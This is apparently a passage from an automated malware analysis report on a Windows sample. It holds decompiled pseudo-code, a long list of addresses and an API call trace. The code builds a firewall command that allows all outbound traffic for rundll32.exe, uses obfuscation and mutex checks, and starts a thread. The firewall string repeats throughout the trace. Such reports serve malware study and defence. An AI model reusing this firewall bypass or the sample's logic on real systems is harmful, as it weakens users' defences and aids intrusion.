							_t197 = _t196;
							if(_t197 != 0) {
								 *0x446c73 = _t197;
								 *0x44720f = _t197;
								GetModuleFileNameA(0, 0x447f63, 0x258);
								if( *0x447f63 == 0x5a ||  *0x447f63 == 0x7a) {
									Sleep(0xffffffff);
								}
								GetWindowsDirectoryA(0x4496d3, 0x3e8);
								lstrcatA(0x4496d3, "\\system32\\rundll32.exe");
								lstrcatA("advfirewall firewall add rule name=\"Rundll32\" dir=out action=allow protocol=any program=\"C:\\Windows\\system32\\rundll32.exe\"", 0x4496d3);
								lstrcatA("advfirewall firewall add rule name=\"Rundll32\" dir=out action=allow protocol=any program=\"C:\\Windows\\system32\\rundll32.exe\"", 0x43f94d);
								_t203 = CreateThread(0, 0, E0040110C, 0, 0, 0x43fb88); // executed
								_push(9);
								asm("rdtsc");
								asm("rol eax, 0x3");
								 *__edi = _t203;
								asm("rol eax, 0x2");
								_t205 = _t203 - 1 + 1;
								 *0x00446C87 = _t205;
								asm("rol eax, 1");
								 *0x00446C8B = _t205;
								_push(_t205);
								 *0x4468e1 =  &M0043F9B5;
								 *0x4468e1 =  *0x4468e1 + 0x64;
								_t206 =  *0x4468e1; // 0x43fa19
								_push(0x2eee4d);
								 *_t415 =  *_t415 + 0x112d22;
								return _t206;
							} else {
								ExitThread();
								return _t197;
							}
						} else {
							ExitThread();
							return _t195;
						}
					} else {
						ExitThread();
						return _t193;
					}
				}
			}


















                                                                0x00401292
                                                                0x00401297
                                                                0x0040129c
                                                                0x0040129c
                                                                0x004012a6
                                                                0x004012a6
                                                                0x004012a6
                                                                0x004012ab
                                                                0x004012ab
                                                                0x004012ac
                                                                0x004012ae
                                                                0x004012ae
                                                                0x004012b1
                                                                0x004012b1
                                                                0x004012b4
                                                                0x004012b5
                                                                0x004012a1
                                                                0x004012a1
                                                                0x00000000
                                                                0x004012b7
                                                                0x004012b7
                                                                0x004012bd
                                                                0x004012d7
                                                                0x004012d9
                                                                0x004012de
                                                                0x004012de
                                                                0x004012ee
                                                                0x004012f8
                                                                0x00401302
                                                                0x0040130c
                                                                0x00401316
                                                                0x00401330
                                                                0x00401332
                                                                0x00401337
                                                                0x00401337
                                                                0x00401343
                                                                0x0040134d
                                                                0x00401357
                                                                0x00401361
                                                                0x0040136b
                                                                0x00401375
                                                                0x0040137f
                                                                0x00401389
                                                                0x00401393
                                                                0x0040139d
                                                                0x004013a7
                                                                0x004013b1
                                                                0x004013bb
                                                                0x004013c5
                                                                0x004013cf
                                                                0x004013d9
                                                                0x004013e3
                                                                0x004013ed
                                                                0x004013f7
                                                                0x00401401
                                                                0x0040140b
                                                                0x00401415
                                                                0x0040141f
                                                                0x00401429
                                                                0x00401433
                                                                0x0040143d
                                                                0x00401447
                                                                0x00401451
                                                                0x0040145b
                                                                0x00401465
                                                                0x0040146f
                                                                0x00401479
                                                                0x00401483
                                                                0x0040148d
                                                                0x00401497
                                                                0x004014a1
                                                                0x004014ab
                                                                0x004014b5
                                                                0x004014bf
                                                                0x004014c9
                                                                0x004014d3
                                                                0x004014dd
                                                                0x004014e7
                                                                0x004014f1
                                                                0x004014fb
                                                                0x00401505
                                                                0x0040150f
                                                                0x00401519
                                                                0x00401523
                                                                0x0040152d
                                                                0x00401537
                                                                0x00401541
                                                                0x0040154b
                                                                0x00401555
                                                                0x0040155f
                                                                0x00401569
                                                                0x00401573
                                                                0x0040157d
                                                                0x00401587
                                                                0x00401591
                                                                0x0040159b
                                                                0x004015a5
                                                                0x004015af
                                                                0x004015b9
                                                                0x004015c3
                                                                0x004015cd
                                                                0x004015d7
                                                                0x004015e1
                                                                0x004015eb
                                                                0x004015f5
                                                                0x004015ff
                                                                0x00401609
                                                                0x00401613
                                                                0x0040161d
                                                                0x00401627
                                                                0x00401631
                                                                0x0040163b
                                                                0x00401645
                                                                0x0040164f
                                                                0x00401659
                                                                0x00401663
                                                                0x0040166d
                                                                0x00401677
                                                                0x00401681
                                                                0x0040168b
                                                                0x00401695
                                                                0x0040169f
                                                                0x004016a9
                                                                0x004016b3
                                                                0x004016bd
                                                                0x004016c7
                                                                0x004016d1
                                                                0x004016db
                                                                0x004016e5
                                                                0x004016ef
                                                                0x004016f9
                                                                0x00401703
                                                                0x0040170d
                                                                0x00401717
                                                                0x00401721
                                                                0x0040172b
                                                                0x00401735
                                                                0x0040173f
                                                                0x00401749
                                                                0x00401753
                                                                0x0040175d
                                                                0x00401767
                                                                0x00401771
                                                                0x0040177b
                                                                0x00401785
                                                                0x0040178f
                                                                0x00401799
                                                                0x004017a3
                                                                0x004017ad
                                                                0x004017b7
                                                                0x004017c1
                                                                0x004017cb
                                                                0x004017d5
                                                                0x004017df
                                                                0x004017e9
                                                                0x004017f3
                                                                0x004017fd
                                                                0x00401807
                                                                0x00401811
                                                                0x0040181b
                                                                0x00401825
                                                                0x0040182f
                                                                0x00401839
                                                                0x00401843
                                                                0x0040184d
                                                                0x00401857
                                                                0x00401861
                                                                0x0040186b
                                                                0x00401875
                                                                0x0040187f
                                                                0x00401889
                                                                0x00401893
                                                                0x0040189d
                                                                0x004018a7
                                                                0x004018b1
                                                                0x004018bb
                                                                0x004018c5
                                                                0x004018cf
                                                                0x004018d9
                                                                0x004018e3
                                                                0x004018ed
                                                                0x004018f7
                                                                0x00401901
                                                                0x0040190b
                                                                0x00401915
                                                                0x0040191f
                                                                0x00401929
                                                                0x00401933
                                                                0x0040193d
                                                                0x00401947
                                                                0x00401951
                                                                0x0040195b
                                                                0x00401965
                                                                0x0040196f
                                                                0x00401979
                                                                0x00401983
                                                                0x0040198d
                                                                0x00401997
                                                                0x004019a1
                                                                0x004019ab
                                                                0x004019b5
                                                                0x004019bf
                                                                0x004019c9
                                                                0x004019d3
                                                                0x004019dd
                                                                0x004019e7
                                                                0x004019f1
                                                                0x004019fb
                                                                0x00401a05
                                                                0x00401a20
                                                                0x00401a25
                                                                0x00401a27
                                                                0x00401a45
                                                                0x00401a4a
                                                                0x00401a4c
                                                                0x00401a6a
                                                                0x00401a6f
                                                                0x00401a71
                                                                0x00401a7b
                                                                0x00401a85
                                                                0x00401a98
                                                                0x00401aa4
                                                                0x00401ab1
                                                                0x00401ab1
                                                                0x00401ac0
                                                                0x00401acf
                                                                0x00401ade
                                                                0x00401aed
                                                                0x00401b04
                                                                0x00401b16
                                                                0x00401b28
                                                                0x00401b2a
                                                                0x00401b2f
                                                                0x00401b31
                                                                0x00401b34
                                                                0x00401b36
                                                                0x00401b39
                                                                0x00401b3c
                                                                0x00401b3f
                                                                0x00401b4c
                                                                0x00401b56
                                                                0x00401b5d
                                                                0x00401b62
                                                                0x00401b67
                                                                0x00401b6e
                                                                0x00401a73
                                                                0x00401a73
                                                                0x00401a78
                                                                0x00401a78
                                                                0x00401a4e
                                                                0x00401a4e
                                                                0x00401a53
                                                                0x00401a53
                                                                0x00401a29
                                                                0x00401a29
                                                                0x00401a2e
                                                                0x00401a2e
                                                                0x00401a27

                                                                APIs
                                                                • HeapAlloc.KERNEL32(00000000,00000008,002C4024,00401109,00000000,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 00401292
                                                                • OpenMutexA.KERNEL32 ref: 004012D0
                                                                • ExitProcess.KERNEL32(00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 004012D9
                                                                • CreateMutexA.KERNEL32(?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"), ref: 004012EE
                                                                • RtlExitUserThread.NTDLL(?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"), ref: 004012F8
                                                                • RtlExitUserThread.NTDLL(?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"), ref: 00401302
                                                                • RtlExitUserThread.NTDLL(?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"), ref: 0040130C
                                                                • RtlExitUserThread.NTDLL(?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"), ref: 00401316
                                                                • OpenMutexA.KERNEL32 ref: 00401329
                                                                • ExitProcess.KERNEL32(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401332
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401343
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040134D
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401357
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401361
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040136B
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401375
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040137F
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401389
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401393
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040139D
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013A7
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013B1
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013BB
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013C5
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013CF
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013D9
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013E3
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013ED
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013F7
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401401
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040140B
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401415
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040141F
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401429
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401433
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040143D
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401447
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401451
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040145B
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401465
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040146F
                                                                  • Part of subcall function 00401272: OpenMutexA.KERNEL32 ref: 0040127B
                                                                  • Part of subcall function 00401272: ExitProcess.KERNEL32(00100000,00000000,UEFIConfig,004012FD,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000), ref: 00401284
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401479
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401483
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040148D
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401497
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014A1
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014AB
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014B5
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014BF
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014C9
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014D3
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014DD
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014E7
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014F1
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014FB
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401505
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040150F
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401519
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401523
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040152D
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401537
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401541
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040154B
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401555
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040155F
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401569
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401573
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040157D
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401587
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401591
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040159B
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004015A5
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004015AF
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004015B9
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004015C3
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004015CD
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004015D7
